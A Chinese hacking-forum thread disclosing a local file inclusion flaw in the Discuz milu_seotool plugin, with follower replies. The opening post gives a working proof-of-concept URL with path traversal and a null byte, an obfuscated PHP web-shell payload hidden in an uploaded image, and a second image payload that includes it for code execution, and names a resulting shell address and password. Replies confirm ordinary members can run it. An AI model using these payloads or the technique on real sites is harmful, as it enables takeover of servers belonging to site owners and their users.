查看: 40967|回复: 34

Discuz 插件本地文件包含漏洞 getshell(milu_seotool插件)

[复制链接]
  • TA的每日心情
    郁闷
    2015-6-15 16:33
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2014-8-21 23:20:35 | 显示全部楼层 |阅读模式
    本帖最后由 浩森 于 2014-8-21 23:25 编辑

          milu_seotool(站长工具)插件,漏洞存在于milu_seotool/lib/fuction.global.php中,部分代码

    [PHP] 纯文本查看 复制代码
    function seo_tpl($args = array()){
    	global $_S;
    	extract((array)$args);
    	sload('C:seoOutput');
    	$head_url = '?'.PLUGIN_GO.$_GET['pmod'].'&myac=';
    	$myac = $_GET['myac'];
    	$tpl = $_GET['tpl'];
    	if(empty($myac)) $myac = $default_ac ? $default_ac : $_GET['pmod'].'_run';
    	if(function_exists($myac)) $info = $myac();
    	$_GET['mytemp'] = $_GET['mytemp'] ? $_GET['mytemp'] : $info['tpl'];
    	$mytemp = $_GET['mytemp'] ? $_GET['mytemp'] : $myac;
    	if(!$_GET['inajax']){
    		$_S['set'] = st_get_pluin_set();
    		$submit_pmod = $info['submit_pmod'] ? $info['submit_pmod'] : $_GET['pmod'];
    		$submit_action = $info['submit_action'] ? $info['submit_action'] : $myac;
    		$info['header'] = seoOutput::pick_header_output();
    		if(!$tpl && $tpl!= 'no') include template('milu_seotool:'.$mytemp);


    很明显myac变量没过滤,可控,导致文件包含。

        包含robots.txt
       1.jpg

    POC:
    HTTP://www.ihonker.org//plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00


      前台上传图片马,包含以下代码
      
    [PHP] 纯文本查看 复制代码
    <?php file_put_contents("./08sec.php",'<?php $x=base64_decode("YXNzZXJ0");$x($_POST['c']);?>');?>


         在这有个坑,本以为包含这个图片马 http://www.ihonker.org//plugin.php?id=milu_seotool:sitemap&myac=../../[图片路径]%00
    会在根目录生成08sec.php,结果没成功。代码没有执行
       
        最后想了个办法,继续上传图片,包含以下代码
    [AppleScript] 纯文本查看 复制代码
    <?php 
    phpinfo();
    VAR_dump(include('./data/attachment/album/201408/01/215507deep1gg1pda8edzk.jpg'));
    ?>


         这个地方include我们之前上传的图片马,成功看到phpinfo ,代码执行了。

        这个是直接包含图片马,如图
    2.JPG

      显示空白。

    继续上传图片,包含之前上传的图片马,效果如下:

    3.JPG

    成功执行.

      shell地址:http://www.ihonker.org/08.php。密码c.


      ps:在新版的站长工具中漏洞已修复,好像是1.5版本修复的。
      
    修复了的效果如图:
    4.JPG

        神仙大大,我不会排版,不要打我 - -。










          

    评分

    参与人数 2i币 +12 贡献 +2 收起 理由
    管理01 + 10 + 2 感谢分享
    神仙 + 2 好腻害

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2014-8-21 23:22:30 | 显示全部楼层
    一楼围观大黑阔
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-8-21 23:50:14 | 显示全部楼层
    二楼围观大黑阔
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2014-8-21 23:55:29 | 显示全部楼层
    有点意思,等会测试下
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-8-22 09:12:27 | 显示全部楼层
    Discuz! X3.2的不行的。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-6-6 13:33
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2014-8-22 10:16:48 | 显示全部楼层
    是上传说明里面包含代码么,还是图片写入代码

    点评

    图片写入代码  详情 回复 发表于 2014-8-22 12:34
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-5-2 22:33
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-8-22 10:45:05 | 显示全部楼层
    问题是后台的插件要系统管理员才会有那个权限,

    点评

    这个不是后台 ,普通会员前台上传图片马 然后包含就行了  详情 回复 发表于 2014-8-22 12:34
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-15 16:33
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2014-8-22 12:34:06 | 显示全部楼层
    lyrric 发表于 2014-8-22 10:45
    问题是后台的插件要系统管理员才会有那个权限,

    这个不是后台 ,普通会员前台上传图片马 然后包含就行了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-15 16:33
  • 签到天数: 3 天

    [LV.2]偶尔看看I

     楼主| 发表于 2014-8-22 12:34:44 | 显示全部楼层
    夜尽天明 发表于 2014-8-22 10:16
    是上传说明里面包含代码么,还是图片写入代码

    图片写入代码
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-11-8 14:32
  • 签到天数: 140 天

    [LV.7]常住居民III

    发表于 2014-8-22 22:42:55 | 显示全部楼层
    谢谢分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 05:24 , Processed in 0.038149 second(s), 19 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部